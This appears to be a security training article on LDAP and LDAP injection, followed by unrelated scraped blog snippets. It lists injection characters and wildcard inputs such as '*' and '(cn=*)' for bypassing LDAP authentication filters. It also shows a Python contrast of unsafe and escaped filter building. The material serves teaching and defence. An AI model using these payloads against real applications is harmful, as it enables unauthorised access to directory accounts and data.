A protocol that defines how clients and servers communicate with each other to access and manipulate data stored in a directory service.	A directory server that uses LDAP as one of its protocols to provide authentication, authorisation, and other services for Windows-based networks.
An open and cross-platform protocol that can be used with different types of directory servers and applications.	Proprietary software that only works with Windows-based systems and requires additional components such as DNS (Domain Name System) and Kerberos for its functionality.
It has a flexible and extensible schema that allows custom attributes and object classes to be defined by administrators or developers.	It has a predefined schema that follows and extends the X.500 standard with additional object classes and attributes specific to Windows environments. Modifications should be made with caution and care.
Supports multiple authentication mechanisms such as simple bind, SASL, etc.	It supports Kerberos as its primary authentication mechanism but also supports NTLM (NT LAN Manager) and LDAP over SSL/TLS for backward compatibility.

LDAP works by using a client-server architecture. A client sends an LDAP request to a server, which searches the directory service and returns a response to the client. LDAP is a protocol that is simpler and more efficient than X.500, on which it is based. It uses a client-server model, where clients send requests to servers using LDAP messages encoded in ASN.1 (Abstract Syntax Notation One) and transmitted over TCP/IP (Transmission Control Protocol/Internet Protocol). The servers process the requests and send back responses using the same format. LDAP supports various requests, such as bind, unbind, search, compare, add, delete, modify, etc.

LDAP requests are messages that clients send to servers to perform operations on data stored in a directory service. An LDAP request is comprised of several components:

  1. Session connection: The client connects to the server via an LDAP port (usually 389 or 636).
  2. Request type: The client specifies the operation it wants to perform, such as bind, search, etc.
  3. Request parameters: The client provides additional information for the request, such as the distinguished name (DN) of the entry to be accessed or modified, the scope and filter of the search query, the attributes and values to be added or changed, etc.
  4. Request ID: The client assigns a unique identifier for each request to match it with the corresponding response from the server.

Once the server receives the request, it processes it and sends back a response message that includes several components:

  1. Response type: The server indicates the operation that was performed in response to the request.
  2. Result code: The server indicates whether or not the operation was successful and why.
  3. Matched DN: If applicable, the server returns the DN of the closest existing entry that matches the request.
  4. Referral: The server returns a URL of another server that may have more information about the request, if applicable.
  5. Response data: The server returns any additional data related to the response, such as the attributes and values of an entry that was searched or modified.

After receiving and processing the response, the client disconnects from the LDAP port.

ldapsearch

For example, ldapsearch is a command-line utility used to search for information stored in a directory using the LDAP protocol. It is commonly used to query and retrieve data from an LDAP directory service.


cmundy2@htb[/htb]$ ldapsearch -H ldap://ldap.example.com:389 -D "cn=admin,dc=example,dc=com" -w secret123 -b "ou=people,dc=example,dc=com" "(mail=john.doe@example.com)"

This command can be broken down as follows:

  • Connect to the server ldap.example.com on port 389.
  • Bind (authenticate) as cn=admin,dc=example,dc=com with password secret123.
  • Search under the base DN ou=people,dc=example,dc=com.
  • Use the filter (mail=john.doe@example.com) to find entries that have this email address.

The server would process the request and send back a response, which might look something like this:

dn: uid=jdoe,ou=people,dc=example,dc=com
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
objectClass: top
cn: John Doe
sn: Doe
uid: jdoe
mail: john.doe@example.com

result: 0 Success

This response includes the entry's distinguished name (DN) that matches the search criteria and its attributes and values.


LDAP Injection

LDAP injection is an attack that exploits web applications that use LDAP (Lightweight Directory Access Protocol) for authentication or storing user information. The attacker can inject malicious code or characters into LDAP queries to alter the application's behaviour, bypass security measures, and access sensitive data stored in the LDAP directory.

To test for LDAP injection, you can use input values that contain special characters or operators that can change the query's meaning:

Input	Description
*	An asterisk * can match any number of characters.
( )	Parentheses ( ) can group expressions.
|	A vertical bar | can perform logical OR.
&	An ampersand & can perform logical AND.
(cn=*)	Input values that try to bypass authentication or authorisation checks by injecting conditions that always evaluate to true can be used. For example, (cn=*) or (objectClass=*) can be used as input values for a username or password fields.

LDAP injection attacks are similar to SQL injection attacks but target the LDAP directory service instead of a database.

For example, suppose an application uses the following LDAP query to authenticate users:

(&(objectClass=user)(sAMAccountName=$username)(userPassword=$password))

In this query, $username and $password contain the user's login credentials. An attacker could inject the * character into the $username or $password field to modify the LDAP query and bypass authentication.

If an attacker injects the * character into the $username field, the LDAP query will match any user account with any password. This would allow the attacker to gain access to the application with any password, as shown below:

$username = "*";
$password = "dummy";
(&(objectClass=user)(sAMAccountName=$username)(userPassword=$password))

Alternatively, if an attacker injects the * character into the $password field, the LDAP query would match any user account with any password that contains the injected string. This would allow the attacker to gain access to the application with any username, as shown below:

$username = "dummy";
$password = "*";
(&(objectClass=user)(sAMAccountName=$username)(userPassword=$password))

LDAP injection attacks can lead to severe consequences, such as unauthorised access to sensitive information, elevated privileges, and even full control over the affected application or server. These attacks can also considerably impact data integrity and availability, as attackers may alter or remove data within the directory service, causing disruptions to applications and services dependent on that data.

To mitigate the risks associated with LDAP injection attacks, it is crucial to thoroughly validate and sanitize user input before incorporating it into LDAP queries. This process should involve removing LDAP-specific special characters like * and employing parameterised queries to ensure user input is treated solely as data, not executable code.
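The wildcard injection and its mitigation, shown side by side as an added example that is not part of the original article: the same authentication filter is built once by plain string substitution and once with RFC 4515 value escaping (escaping rather than stripping the special characters). The small filter matcher, the directory entries and all function names are constructed for illustration, and the matcher handles only the flat AND-of-equality filter form used above.

```python
import re

SPECIAL = "\\*()\x00"  # characters RFC 4515 requires to be escaped in a value

# Constructed directory; asmith's real password is literally "*".
DIRECTORY = [
    {"objectclass": ["user"], "samaccountname": ["jdoe"], "userpassword": ["S3cure!Pass"]},
    {"objectclass": ["user"], "samaccountname": ["asmith"], "userpassword": ["*"]},
]

TEMPLATE = "(&(objectClass=user)(sAMAccountName=%s)(userPassword=%s))"
CLAUSE = re.compile(r"\(([A-Za-z][\w-]*)=([^()]*)\)")
HEX_PAIR = re.compile(r"\\([0-9a-fA-F]{2})")


def escape_filter_value(value):
    """Replace each special character with a backslash and two hex digits."""
    return "".join("\\%02x" % ord(c) if c in SPECIAL else c for c in value)


def build_filter_unsafe(username, password):
    """Vulnerable: user input becomes part of the filter syntax."""
    return TEMPLATE % (username, password)


def build_filter_safe(username, password):
    """Hardened: user input can only ever be a literal value."""
    return TEMPLATE % (escape_filter_value(username), escape_filter_value(password))


def value_regex(pattern):
    """Turn one filter value into a regex: a raw * is a wildcard, \\XX is literal."""
    literal_parts = []
    for part in pattern.split("*"):
        decoded = HEX_PAIR.sub(lambda m: chr(int(m.group(1), 16)), part)
        literal_parts.append(re.escape(decoded))
    return re.compile(".*".join(literal_parts), re.DOTALL)


def search(ldap_filter, directory=DIRECTORY):
    """Return the account names of entries matching every clause of the filter."""
    clauses = CLAUSE.findall(ldap_filter)
    matches = []
    for entry in directory:
        if all(
            any(value_regex(pattern).fullmatch(v) for v in entry.get(attr.lower(), []))
            for attr, pattern in clauses
        ):
            matches.append(entry["samaccountname"][0])
    return matches


if __name__ == "__main__":
    for user, pw in [("jdoe", "*"), ("*", "*"), ("jdoe", "S3cure!Pass"), ("asmith", "*")]:
        print(user, pw,
              "unsafe:", search(build_filter_unsafe(user, pw)),
              "safe:", search(build_filter_safe(user, pw)))
```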


计算最接近的数

计算最接近的数 真题目录: 点击去查看 E B卷 100分题型 题目描述 给定一个数组X和正整数K&#xff0c;请找出使表达式&#xff1a; X[i] - X[i 1] - … - X[i K - 1] 结果最接近于数组中位数的下标 i &#xff0c;如果有多个 i 满足条件&#xff0c;请返回最大的 i. 其中&…...

Ubuntu离线docker compose安装DataEase 2.10.4版本笔记

1、先准备一个可以正常上网的相同版本的Ubuntu系统&#xff0c;可以使用虚拟机。Ubuntu系统需要安装好docker compose或docker-compose 2、下载dataease-online-installer-v2.10.4-ce.tar在线安装包&#xff0c;解压并执行install.sh进行安装和启动 3、导出docker镜像 sudo d…...

C#使用WMI获取控制面板中安装的所有程序列表

C#使用WMI获取控制面板中安装的所有程序列表 WMI 全称Windows Management Instrumentation,Windows Management Instrumentation是Windows中用于提供共同的界面和对象模式以便访问有关操作系统、设备、应用程序和服务的管理信息。如果此服务被终止&#xff0c;多数基于 Windo…...

WPF2-1在xaml为对象的属性赋值.md

1. AttributeValue方式 1.1. 简单属性赋值1.2. 对象属性赋值 2. 属性标签的方式给属性赋值3. 标签扩展 (Markup Extensions) 3.1. StaticResource3.2. Binding 3.2.1. 普通 Binding3.2.2. ElementName Binding3.2.3. RelativeSource Binding3.2.4. StaticResource Binding (带参…...

社区版Dify实现文生视频 LLM+ComfyUI+混元视频

社区版Dify实现文生视频 LLMComfyUI混元视频 一、 社区版Dify实现私有化混元视频效果二、为什么社区版Dify可以在对话框实现文生视频&#xff1f;LLMComfyUI混元视频 实现流程图&#xff08;重点&#xff09;1. 文生视频模型支持ComfyUI2. ComfyUI可以轻松导出API实现封装3. Di…...

QT调用OpenSceneGraph

OSG和osgQt编译教程&#xff0c;实测通过 一、下载OpenSceneGraph OpenSceneGraphhttps://github.com/openscenegraph/OpenSceneGraph 二、使用CMAKE编译OpenSceneGraph 1.打开cmake&#xff0c;配置源代码目录 2. CMAKE_INSTALL_PREFIX设置为install文件夹&#xff0c;生…...

Qt基础项目篇——Qt版Word字处理软件

一、核心功能 本软件为多文档型程序&#xff0c;界面是标准的 Windows 主从窗口 拥有&#xff1a;主菜单、工具栏、文档显示区 和 状态栏。 所要实现的东西&#xff0c;均在下图了。 开发该软件&#xff0c;主要分为下面三个阶段 1&#xff09;界面设计开发 多窗口 MDI 程序…...

【Postgres_Python】使用python脚本批量创建和导入多个PG数据库

之前批量创建和导入数据库分为2个python脚本进行&#xff0c;现整合优化代码合并为一个python脚本&#xff0c;可同步实现数据库的创建和数据导入。之前的文章链接&#xff1a; 【Postgres_Python】使用python脚本批量创建PG数据库 【Postgres_Python】使用python脚本将多个.S…...

消息队列篇--原理篇--RabbitMQ和Kafka对比分析

RabbitMQ和Kafka是两种非常流行的消息队列系统&#xff0c;但它们的设计哲学、架构特点和适用场景存在显著差异。对比如下。 1、架构设计 RabbitMQ&#xff1a; 基AMQP协议&#xff1a;RabbitMQ是基于AMQP&#xff08;高级消息队列协议&#xff09;构建的&#xff0c;支持多…...

俄语画外音的特点

随着全球媒体消费的增加&#xff0c;语音服务呈指数级增长。作为视听翻译和本地化的一个关键方面&#xff0c;画外音在确保来自不同语言和文化背景的观众能够以一种真实和可访问的方式参与内容方面发挥着重要作用。说到俄语&#xff0c;画外音有其独特的特点、挑战和复杂性&…...

【机器学习实战中阶】音乐流派分类-自动化分类不同音乐风格

音乐流派分类 – 自动化分类不同音乐风格 在本教程中,我们将开发一个深度学习项目,用于自动化地从音频文件中分类不同的音乐流派。我们将使用音频文件的频率域和时间域低级特征来分类这些音频文件。 对于这个项目,我们需要一个具有相似大小和相似频率范围的音频曲目数据集…...

Keil5 IDE使用笔记

1 Keil生成bin文件 $K\ARM\ARMCLANG\bin\fromelf.exe --bin --outputL/L.bin !L $K: 表示 Keil 5的安装路径 L: 表示 工程名 !L: 表示 工程名.arf 后缀的文件 可根据实际需要修改 --output 的值调整生成的bin文件的存放路径。 2 下载程序报错 No ST-LINK detected Error: Fla…...

自动化办公|使用Python重命名并移动文件到对应文件夹

在日常的文件管理和处理过程中&#xff0c;我们可能会遇到需要将文件整理到不同文件夹中的需求。例如&#xff0c;我们有一个包含多个文件的目录&#xff0c;文件名的首字符表示文件应该存放在哪个文件夹中。我们可以使用Python脚本来自动完成这个任务&#xff0c;实现文件的分…...

【全栈】SprintBoot+vue3迷你商城(5)

【全栈】SprintBootvue3迷你商城&#xff08;5&#xff09; 上一期我们基本完成了与用户相关的接口&#xff0c;而这些接口都是用户才能干的事情&#xff0c;如果你没登录&#xff0c;那么这些接口功能你都不能实现。 那么如何做到这一步呢&#xff1f; 1.Token 作用 身份…...

Java 并发编程:Java 中的乐观锁与 CAS

大家好,我是栗筝i,这篇文章是我的 “栗筝i 的 Java 技术栈” 专栏的第 025 篇文章,在 “栗筝i 的 Java 技术栈” 这个专栏中我会持续为大家更新 Java 技术相关全套技术栈内容。专栏的主要目标是已经有一定 Java 开发经验,并希望进一步完善自己对整个 Java 技术体系来充实自…...

模拟飞行入坑(五) P3D 多通道视角配置 viewgroup

背景&#xff1a; P3D进行多个屏幕显示的时候&#xff0c;如果使用英伟达自带的屏幕融合成一个屏&#xff0c;或者使用P3D单独拉伸窗口&#xff0c;会使得P3D的画面被整体拉伸&#xff0c;又或者,当使用Multichannel进行多个设备联动时&#xff0c;视角同步组合需要配置&#…...

react中hooks之 React 19 新 Hooks useActionState useFormStatus用法总结

React 19 新 Hooks 使用指南: useActionState & useFormStatus 目录 useActionStateuseFormStatus最佳实践 useActionState 概述 useActionState 是 React 19 引入的新 Hook&#xff0c;用于处理表单 action 的状态更新。它允许你基于表单 action 的结果来更新组件状态…...

为AI聊天工具添加一个知识系统 之48 蒙板程序设计(第二版):Respect九宫格【社会形态:治理】

本文要点 1、词汇表Vocabulary &#xff08;普通名词&#xff09; 1) 三组词&#xff08;数据库支持的三个数字散列&#xff09;&#xff1a; 工作&#xff0c;工件&#xff0c;工具。论题&#xff0c;主题词&#xff0c;关键字。口号&#xff0c;符号&#xff0c;编号。 2…...

靠右行驶数学建模分析(2014MCM美赛A题)

笔记 题目 要求分析&#xff1a; 比较规则的性能&#xff0c;分为light和heavy两种情况&#xff0c;性能指的是 a.流量与安全 b. 速度限制等分析左侧驾驶分析智能系统 论文 参考论文 两类规则分析 靠右行驶&#xff08;第一条&#xff09;2. 无限制&#xff08;去掉了第一条…...

6.5、密集波分复用系统(DWDM)/OTN

图中从左到右分为多个部分&#xff0c;分别代表了信号的输入、传输和输出过程。 左侧是客户侧&#xff0c;有普通接口和彩色接口&#xff0c;分别连接到光转发单元&#xff08;OTU&#xff09;。 中间部分是传输线路&#xff0c;包含多个光放大器&#xff08;OBA、OLA、OPA&…...

Unity3D基于Unity整合BEPUphysicsint物理引擎实战详解

引言 Unity3D是一款流行的游戏引擎&#xff0c;提供了丰富的功能和工具&#xff0c;使开发者能够轻松创建各种类型的游戏。其中&#xff0c;帧同步技术是游戏开发中至关重要的一环&#xff0c;它能确保多个玩家在同一时间内看到的游戏状态是一致的。BEPUphysicsint是一个基于U…...

《探秘鸿蒙Next:如何保障AI模型轻量化后多设备协同功能一致》

在鸿蒙Next的多设备协同场景中&#xff0c;确保人工智能模型轻量化后功能的一致性是一项极具挑战性但又至关重要的任务。以下是一些关键的方法和策略。 统一的模型架构与标准 采用标准化框架&#xff1a;选择如TensorFlow Lite、PyTorch Mobile等在鸿蒙Next上适配良好的轻量化…...

微服务知识——4大主流微服务架构方案

文章目录 1、微服务聚合模式2、微服务共享模式3、微服务代理模式4、微服务异步消息模式 微服务是大型架构的必经之路&#xff0c;也是大厂重点考察对象&#xff0c;下面我就重点详解4大主流微服务架构方案。 1、微服务聚合模式 微服务聚合设计模式&#xff0c;解决了如何从多个…...

Java 方法重写

目录 一、什么是方法重写&#xff0c;为什么需要它 二、方法重写的规则 三、方法重写的实际应用场景 四、方法重写与重载的区别 五、总结 在 Java 编程的精彩世界里&#xff0c;方法重写是一项极为重要且实用的特性&#xff0c;它犹如一把神奇的钥匙&#xff0c;为我们开启…...

华为E9000刀箱服务器监控指标解读

美信监控易内置了数千种常见设备监测器&#xff0c;能够监测超过20万项指标。这些指标涵盖了从硬件设备到软件系统&#xff0c;从网络性能到安全状态等各个方面。如下基于美信监控易——IT基础监控模块&#xff0c;对华为E9000刀箱服务器部分监控指标进行解读。 一、华为E9000…...

正则表达式基础与应用

什么是正则表达式&#xff1f; 正则表达式&#xff08;Regular Expression&#xff0c;简称regex&#xff09;是一种用于描述字符串结构的语法规则。它定义了一个搜索模式&#xff0c;可以用来匹配、替换或提取文本中的子串。正则表达式广泛应用于文本处理、数据验证、查找和替…...

微信小程序使用上拉加载onReachBottom。页面拖不动。一直无法触发上拉的事件。

1&#xff0c;可能是原因是你使用了scroll-view的标签&#xff0c;用onReachBottom触发加载事件。这两个是有冲突的。没办法一起使用。如果页面的样式是滚动的是无法去触发页面的onReachBottom的函数的。因此&#xff0c;你使用overflow:auto.来使用页面的某些元素滚动&#xf…...

9. 神经网络(一.神经元模型)

首先&#xff0c;先看一个简化的生物神经元结构&#xff1a; 生物神经元有多种类型&#xff0c;内部也有复杂的结构&#xff0c;但是可以把单个神经元简化为3部分组成&#xff1a; 树突&#xff1a;一个神经元往往有多个树突&#xff0c;用于接收传入的信息。轴突&#xff1a;…...

Mysql安装,mysql-installer-community-8.0.41.0

“windowR"键弹出运行框&#xff0c;输入”cmd"进入window命令提示符&#xff0c;输入“mysql -uroot -p"按下回车&#xff0c;再输入密码&#xff0c;按下回车&#xff0c;出现下面界面则是配置成功。 默认会在 C:\Program Files\MySQL\MySQL Server 8.0\bin …...

吴恩达深度学习——神经网络介绍

文章内容来自BV11H4y1F7uH&#xff0c;仅为个人学习所用。 文章目录 什么是神经网络引入神经网络神经元激活函数ReLU隐藏单元 用神经网络进行监督学习监督学习与无监督学习举例 什么是神经网络 引入 已经有六个房子的数据集&#xff0c;横轴为房子大小&#xff0c;纵轴为房子…...

【SpringBoot】SpringBoot中分页插件(PageHelper)的使用

目录 1.分页概念 2.原生写法 3.PageHelper插件分页查询 3.1 介绍 3.2?使用 3.3 Page对象和PageInf对象 1.分页概念 用户查询的数据不可能一次性全部展示给用户&#xff08;如果用户有一万条数据呢&#xff09;&#xff0c;而是分页展示给用户&#xff0c;这就是分页查询…...

JavaScript DOM 操作与事件处理

Hi&#xff0c;我是布兰妮甜 &#xff01;在现代Web开发中&#xff0c;JavaScript不仅是用来增强用户体验的工具&#xff0c;它更是创建动态、交互式网页的关键。通过操作文档对象模型&#xff08;DOM&#xff09;和处理用户事件&#xff0c;开发者能够构建出响应迅速且功能丰富…...

rstrip 方法是 Python 字符串的一个内置方法,用于 删除字符串右边(末尾)的指定字符

rstrip 方法是 Python 字符串的一个内置方法&#xff0c;用于 删除字符串右边&#xff08;末尾&#xff09;的指定字符。 语法&#xff1a; string.rstrip([chars])string&#xff1a;原始字符串。chars&#xff1a;可选参数&#xff0c;指定要删除的字符。默认为 None&#…...

【Elasticsearch】腾讯云安装Elasticsearch

Elasticsearch 认识Elasticsearch安装Elasticsearch安装Kibana安装IK分词器分词器的作用是什么&#xff1f;IK分词器有几种模式&#xff1f;IK分词器如何拓展词条&#xff1f;如何停用词条&#xff1f; 认识Elasticsearch Elasticsearch的官方网站如下 Elasticsearch官网 Ela…...

rsync结合inotify实现文件实时同步

rsync 1.复制工具 本地复制 远程复制 cp dd 跨主机传递文件 rz sz ftp scp rsync nfs samba drdb 2.rsync作用 实现文件的备份&#xff0c;可以是当前主机&#xff0c;也可以是远程主机&#xff1b;可以完全备份&#xff0c;也可以是增量备份 2.1功能 类似于cp的复制功能…...

浅谈 PID 控制算法

PID 控制算法概念 在我们的生活中可能大家都没有听说过 PID 控制算法&#xff0c;但它可以说是无处不在&#xff0c;小到空调的温度控制、无人机的精准悬停、机器人运作系统&#xff0c;大到飞机和火箭的飞行姿态控制都有 PID 的身影。 PID 控制算法&#xff0c;即比例 - 积分…...